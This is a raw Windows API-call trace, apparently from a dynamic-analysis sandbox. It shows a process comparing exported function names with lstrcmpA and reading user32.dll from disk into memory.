lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocGetPerceivedType") returned 1 [0227.347] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocIsDangerous") returned 1 [0227.347] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryKeyA") returned 1 [0227.347] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryKeyW") returned 1 [0227.347] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryStringA") returned 1 [0227.347] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryStringByKeyA") returned 0 [0227.347] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocCreate") returned 1 [0227.347] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocGetPerceivedType") returned 1 [0227.347] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocIsDangerous") returned 1 [0227.347] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryKeyA") returned 1 [0227.347] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryKeyW") returned 1 [0227.347] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringA") returned 1 [0227.347] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringByKeyA") returned 1 [0227.347] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringByKeyW") returned 0 [0227.347] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocCreate") returned 1 [0227.347] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocGetPerceivedType") returned 1 [0227.347] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocIsDangerous") returned 1 [0227.347] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryKeyA") returned 1 [0227.347] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryKeyW") returned 1 [0227.347] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringA") returned 1 [0227.348] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringByKeyA") returned 1 [0227.348] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringByKeyW") returned 1 [0227.348] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringW") returned 0 [0227.348] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocCreate") returned 1 [0227.348] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocGetPerceivedType") returned 1 [0227.348] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocIsDangerous") returned 1 [0227.348] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryKeyA") returned 1 [0227.348] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryKeyW") returned 1 [0227.348] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringA") returned 1 [0227.348] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringByKeyA") returned 1 [0227.348] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringByKeyW") returned 1 [0227.348] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringW") returned 1 [0227.348] lstrcmpA (lpString1="ChrCmpIA", lpString2="ChrCmpIA") returned 0 [0227.348] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocCreate") returned 1 [0227.348] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocGetPerceivedType") returned 1 [0227.348] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocIsDangerous") returned 1 [0227.348] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryKeyA") returned 1 [0227.348] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryKeyW") returned 1 [0227.348] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringA") returned 1 [0227.348] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringByKeyA") returned 1 [0227.348] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringByKeyW") returned 1 [0227.348] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringW") returned 1 [0227.348] lstrcmpA (lpString1="ChrCmpIW", lpString2="ChrCmpIA") returned 1 [0227.348] lstrcmpA (lpString1="ChrCmpIW", lpString2="ChrCmpIW") returned 0 [0227.348] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocCreate") returned 1 [0227.348] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocGetPerceivedType") returned 1 [0227.348] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocIsDangerous") returned 1 [0227.348] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryKeyA") returned 1 [0227.348] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryKeyW") returned 1 [0227.348] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringA") returned 1 [0227.348] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringByKeyA") returned 1 [0227.348] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringByKeyW") returned 1 [0227.348] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringW") returned 1 [0227.349] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ChrCmpIA") returned 1 [0227.349] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ChrCmpIW") returned 1 [0227.349] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ColorAdjustLuma") returned 0 [0227.349] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocCreate") returned 1 [0227.349] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocGetPerceivedType") returned 1 [0227.349] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocIsDangerous") returned 1 [0227.349] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryKeyA") returned 1 [0227.349] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryKeyW") returned 1 [0227.349] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringA") returned 1 [0227.349] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringByKeyA") returned 1 [0227.349] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringByKeyW") returned 1 [0227.349] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringW") returned 1 [0227.349] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ChrCmpIA") returned 1 [0227.349] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ChrCmpIW") returned 1 [0227.349] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ColorAdjustLuma") returned 1 [0227.349] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ColorHLSToRGB") returned 0 [0227.349] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocCreate") returned 1 [0227.349] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocGetPerceivedType") returned 1 [0227.349] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocIsDangerous") returned 1 [0227.349] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryKeyA") returned 1 [0227.349] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryKeyW") returned 1 [0227.349] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringA") returned 1 [0227.349] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringByKeyA") returned 1 [0227.349] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringByKeyW") returned 1 [0227.349] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringW") returned 1 [0227.350] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ChrCmpIA") returned 1 [0227.350] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ChrCmpIW") returned 1 [0227.350] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorAdjustLuma") returned 1 [0227.350] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorHLSToRGB") returned 1 [0227.350] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorRGBToHLS") returned 0 [0227.350] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocCreate") returned 1 [0227.350] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocGetPerceivedType") returned 1 [0227.350] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocIsDangerous") returned 1 [0227.350] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryKeyA") returned 1 [0227.350] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryKeyW") returned 1 [0227.350] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringA") returned 1 [0227.350] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringByKeyA") returned 1 [0227.350] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringByKeyW") returned 1 [0227.350] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringW") returned 1 [0227.350] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ChrCmpIA") returned 1 [0227.350] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ChrCmpIW") returned 1 [0227.350] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorAdjustLuma") returned 1 [0227.350] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorHLSToRGB") returned 1 [0227.350] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorRGBToHLS") returned 1 [0227.350] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ConnectToConnectionPoint") returned 0 [0227.350] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocCreate") returned 1 [0227.350] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocGetPerceivedType") returned 1 [0227.350] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocIsDangerous") returned 1 [0227.350] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryKeyA") returned 1 [0227.350] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryKeyW") returned 1 [0227.350] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringA") returned 1 [0227.350] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringByKeyA") returned 1 [0227.350] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringByKeyW") returned 1 [0227.350] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringW") returned 1 [0227.350] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ChrCmpIA") returned 1 [0227.351] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ChrCmpIW") returned 1 [0227.351] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorAdjustLuma") returned 1 [0227.351] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorHLSToRGB") returned 1 [0227.351] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorRGBToHLS") returned 1 [0227.351] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ConnectToConnectionPoint") returned 1 [0227.351] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="DelayLoadFailureHook") returned 0 [0227.351] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocCreate") returned 1 [0227.351] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocGetPerceivedType") returned 1 [0227.351] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocIsDangerous") returned 1 [0227.351] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryKeyA") returned 1 [0227.351] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryKeyW") returned 1 [0227.351] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringA") returned 1 [0227.351] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringByKeyA") returned 1 [0227.351] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringByKeyW") returned 1 [0227.351] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringW") returned 1 [0227.351] lstrcmpA (lpString1="DllGetClassObject", lpString2="ChrCmpIA") returned 1 [0227.351] lstrcmpA (lpString1="DllGetClassObject", lpString2="ChrCmpIW") returned 1 [0227.351] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorAdjustLuma") returned 1 [0227.351] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorHLSToRGB") returned 1 [0227.351] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorRGBToHLS") returned 1 [0227.351] lstrcmpA (lpString1="DllGetClassObject", lpString2="ConnectToConnectionPoint") returned 1 [0227.351] lstrcmpA (lpString1="DllGetClassObject", lpString2="DelayLoadFailureHook") returned 1 [0227.351] lstrcmpA (lpString1="DllGetClassObject", lpString2="DllGetClassObject") returned 0 [0227.351] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocCreate") returned 1 [0227.351] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocGetPerceivedType") returned 1 [0227.351] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocIsDangerous") returned 1 [0227.351] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryKeyA") returned 1 [0227.351] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryKeyW") returned 1 [0227.351] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringA") returned 1 [0227.351] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringByKeyA") returned 1 [0227.352] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringByKeyW") returned 1 [0227.352] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringW") returned 1 [0227.352] lstrcmpA (lpString1="DllGetVersion", lpString2="ChrCmpIA") returned 1 [0227.352] lstrcmpA (lpString1="DllGetVersion", lpString2="ChrCmpIW") returned 1 [0227.352] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorAdjustLuma") returned 1 [0227.352] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorHLSToRGB") returned 1 [0227.352] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorRGBToHLS") returned 1 [0227.352] lstrcmpA (lpString1="DllGetVersion", lpString2="ConnectToConnectionPoint") returned 1 [0227.352] lstrcmpA (lpString1="DllGetVersion", lpString2="DelayLoadFailureHook") returned 1 [0227.352] lstrcmpA (lpString1="DllGetVersion", lpString2="DllGetClassObject") returned 1 [0227.352] lstrcmpA (lpString1="DllGetVersion", lpString2="DllGetVersion") returned 0 [0227.352] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocCreate") returned 1 [0227.352] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocGetPerceivedType") returned 1 [0227.352] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocIsDangerous") returned 1 [0227.352] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryKeyA") returned 1 [0227.352] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryKeyW") returned 1 [0227.352] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringA") returned 1 [0227.352] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringByKeyA") returned 1 [0227.352] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringByKeyW") returned 1 [0227.352] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringW") returned 1 [0227.352] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ChrCmpIA") returned 1 [0227.352] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ChrCmpIW") returned 1 [0227.352] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorAdjustLuma") returned 1 [0227.352] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorHLSToRGB") returned 1 [0227.353] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorRGBToHLS") returned 1 [0227.353] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ConnectToConnectionPoint") returned 1 [0227.353] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DelayLoadFailureHook") returned 1 [0227.353] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DllGetClassObject") returned 1 [0227.353] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DllGetVersion") returned 1 [0227.353] lstrcmpA (lpString1="GUIDFromStringW", lpString2="GUIDFromStringW") returned 0 [0227.353] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocCreate") returned 1 [0227.353] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocGetPerceivedType") returned 1 [0227.353] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocIsDangerous") returned 1 [0227.353] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryKeyA") returned 1 [0227.353] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryKeyW") returned 1 [0227.353] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringA") returned 1 [0227.353] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringByKeyA") returned 1 [0227.353] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringByKeyW") returned 1 [0227.353] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringW") returned 1 [0227.353] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ChrCmpIA") returned 1 [0227.353] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ChrCmpIW") returned 1 [0227.353] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorAdjustLuma") returned 1 [0227.353] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorHLSToRGB") returned 1 [0227.353] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorRGBToHLS") returned 1 [0227.353] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ConnectToConnectionPoint") returned 1 [0227.353] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DelayLoadFailureHook") returned 1 [0227.353] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DllGetClassObject") returned 1 [0227.353] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DllGetVersion") returned 1 [0227.353] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="GUIDFromStringW") returned -1 [0227.353] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="GetAcceptLanguagesA") returned 0 [0227.353] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocCreate") returned 1 [0227.353] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocGetPerceivedType") returned 1 [0227.353] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocIsDangerous") returned 1 [0227.354] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryKeyA") returned 1 [0227.354] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryKeyW") returned 1 [0227.354] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringA") returned 1 [0227.354] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringByKeyA") returned 1 [0227.354] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringByKeyW") returned 1 [0227.354] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringW") returned 1 [0227.354] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ChrCmpIA") returned 1 [0227.354] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ChrCmpIW") returned 1 [0227.354] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorAdjustLuma") returned 1 [0227.354] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorHLSToRGB") returned 1 [0227.354] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorRGBToHLS") returned 1 [0227.354] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ConnectToConnectionPoint") returned 1 [0227.354] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DelayLoadFailureHook") returned 1 [0227.355] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DllGetClassObject") returned 1 [0227.355] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DllGetVersion") returned 1 [0227.355] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GUIDFromStringW") returned -1 [0227.355] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GetAcceptLanguagesA") returned 1 [0227.355] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GetAcceptLanguagesW") returned 0 [0227.355] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocCreate") returned 1 [0227.355] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocGetPerceivedType") returned 1 [0227.355] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocIsDangerous") returned 1 [0227.355] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryKeyA") returned 1 [0227.355] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryKeyW") returned 1 [0227.355] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringA") returned 1 [0227.355] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringByKeyA") returned 1 [0227.355] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringByKeyW") returned 1 [0227.355] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringW") returned 1 [0227.355] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ChrCmpIA") returned 1 [0227.356] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ChrCmpIW") returned 1 [0227.356] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorAdjustLuma") returned 1 [0227.356] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorHLSToRGB") returned 1 [0227.356] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorRGBToHLS") returned 1 [0227.356] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ConnectToConnectionPoint") returned 1 [0227.356] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DelayLoadFailureHook") returned 1 [0227.356] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DllGetClassObject") returned 1 [0227.356] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DllGetVersion") returned 1 [0227.628] GetProcessHeap () returned 0x570000 [0227.628] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2d45030 | out: hHeap=0x570000) returned 1 [0227.628] GetProcessHeap () returned 0x570000 [0227.628] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5890c0 [0227.628] LoadLibraryA (lpLibFileName="User32.dll") returned 0x7ffc5e960000 [0227.630] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0227.630] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0227.631] GetModuleFileNameA (in: hModule=0x7ffc5e960000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0227.631] CreateFileA (lpFileName="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0227.631] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0227.631] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0227.631] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1398200) returned 1 [0227.632] GetProcessHeap () returned 0x570000 [0227.632] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1555b8) returned 0x4108040 [0227.635] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0227.635] ReadFile (in: hFile=0x17c, lpBuffer=0x4108040, nNumberOfBytesToRead=0x1555b8, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4108040*, lpNumberOfBytesRead=0x14f5a4*=0x1555b8, lpOverlapped=0x0) returned 1 [0228.343] CloseHandle (hObject=0x17c) returned 1 [0228.344] lstrcmpA (lpString1="ActivateKeyboardLayout", lpString2="ActivateKeyboardLayout") returned 0 [0228.344] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="ActivateKeyboardLayout") returned 1 [0228.345] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="AddClipboardFormatListener") returned 0 [0228.345] lstrcmpA (lpString1="AdjustWindowRect", lpString2="ActivateKeyboardLayout") returned 1 [0228.346] lstrcmpA (lpString1="AdjustWindowRect", lpString2="AddClipboardFormatListener") returned 1 [0228.346] lstrcmpA (lpString1="AdjustWindowRect", lpString2="AdjustWindowRect") returned 0 [0228.346] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="ActivateKeyboardLayout") returned 1 [0228.346] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AddClipboardFormatListener") returned 1 [0228.347] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AdjustWindowRect") returned 1 [0228.347] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AdjustWindowRectEx") returned 0 [0228.347] lstrcmpA (lpString1="AlignRects", lpString2="ActivateKeyboardLayout") returned 1 [0228.347] lstrcmpA (lpString1="AlignRects", lpString2="AddClipboardFormatListener") returned 1 [0228.347] lstrcmpA (lpString1="AlignRects", lpString2="AdjustWindowRect") returned 1 [0228.347] lstrcmpA (lpString1="AlignRects", lpString2="AdjustWindowRectEx") returned 1 [0228.347] lstrcmpA (lpString1="AlignRects", lpString2="AlignRects") returned 0 [0228.347] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="ActivateKeyboardLayout") returned 1 [0228.347] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AddClipboardFormatListener") returned 1 [0228.347] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AdjustWindowRect") returned 1 [0228.347] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AdjustWindowRectEx") returned 1 [0228.347] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AlignRects") returned 1 [0228.347] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AllowForegroundActivation") returned 0 [0228.348] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="ActivateKeyboardLayout") returned 1 [0228.348] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AddClipboardFormatListener") returned 1 [0228.348] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AdjustWindowRect") returned 1 [0228.348] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AdjustWindowRectEx") returned 1 [0228.348] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AlignRects") returned 1 [0228.348] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AllowForegroundActivation") returned 1 [0228.348] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AllowSetForegroundWindow") returned 0 [0228.348] lstrcmpA (lpString1="AnimateWindow", lpString2="ActivateKeyboardLayout") returned 1 [0228.348] lstrcmpA (lpString1="AnimateWindow", lpString2="AddClipboardFormatListener") returned 1 [0228.348] lstrcmpA (lpString1="AnimateWindow", lpString2="AdjustWindowRect") returned 1 [0228.348] lstrcmpA (lpString1="AnimateWindow", lpString2="AdjustWindowRectEx") returned 1 [0228.348] lstrcmpA (lpString1="AnimateWindow", lpString2="AlignRects") returned 1 [0228.348] lstrcmpA (lpString1="AnimateWindow", lpString2="AllowForegroundActivation") returned 1 [0228.348] lstrcmpA (lpString1="AnimateWindow", lpString2="AllowSetForegroundWindow") returned 1 [0228.348] lstrcmpA (lpString1="AnimateWindow", lpString2="AnimateWindow") returned 0 [0228.349] lstrcmpA (lpString1="AnyPopup", lpString2="ActivateKeyboardLayout") returned 1 [0228.349] lstrcmpA (lpString1="AnyPopup", lpString2="AddClipboardFormatListener") returned 1 [0228.349] lstrcmpA (lpString1="AnyPopup", lpString2="AdjustWindowRect") returned 1 [0228.349] lstrcmpA (lpString1="AnyPopup", lpString2="AdjustWindowRectEx") returned 1 [0228.349] lstrcmpA (lpString1="AnyPopup", lpString2="AlignRects") returned 1 [0228.349] lstrcmpA (lpString1="AnyPopup", lpString2="AllowForegroundActivation") returned 1 [0228.349] lstrcmpA (lpString1="AnyPopup", lpString2="AllowSetForegroundWindow") returned 1 [0228.349] lstrcmpA (lpString1="AnyPopup", lpString2="AnimateWindow") returned 1 [0228.349] lstrcmpA (lpString1="AnyPopup", lpString2="AnyPopup") returned 0 [0228.349] lstrcmpA (lpString1="AppendMenuA", lpString2="ActivateKeyboardLayout") returned 1 [0228.349] lstrcmpA (lpString1="AppendMenuA", lpString2="AddClipboardFormatListener") returned 1 [0228.349] lstrcmpA 